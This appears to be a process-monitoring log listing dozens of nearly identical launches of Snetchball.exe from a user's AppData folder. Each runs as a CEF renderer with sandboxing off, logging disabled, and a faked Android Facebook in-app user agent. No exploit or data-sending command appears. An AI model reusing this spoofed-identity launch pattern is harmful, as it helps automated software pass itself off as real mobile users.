"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --mojo-platform-channel-handle=4444 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --mojo-platform-channel-handle=4524 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --mojo-platform-channel-handle=4448 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --mojo-platform-channel-handle=3984 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --mojo-platform-channel-handle=2396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --mojo-platform-channel-handle=3648 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --mojo-platform-channel-handle=4020 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --mojo-platform-channel-handle=4356 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --mojo-platform-channel-handle=4416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --mojo-platform-channel-handle=4308 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --mojo-platform-channel-handle=4432 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --mojo-platform-channel-handle=2580 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --mojo-platform-channel-handle=3796 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --mojo-platform-channel-handle=3956 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --mojo-platform-channel-handle=4416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --mojo-platform-channel-handle=744 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --mojo-platform-channel-handle=4380 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --mojo-platform-channel-handle=4496 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --mojo-platform-channel-handle=4504 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --mojo-platform-channel-handle=1256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --mojo-platform-channel-handle=4308 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --mojo-platform-channel-handle=4324 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --mojo-platform-channel-handle=4300 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --mojo-platform-channel-handle=4144 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --mojo-platform-channel-handle=2396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --mojo-platform-channel-handle=1480 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
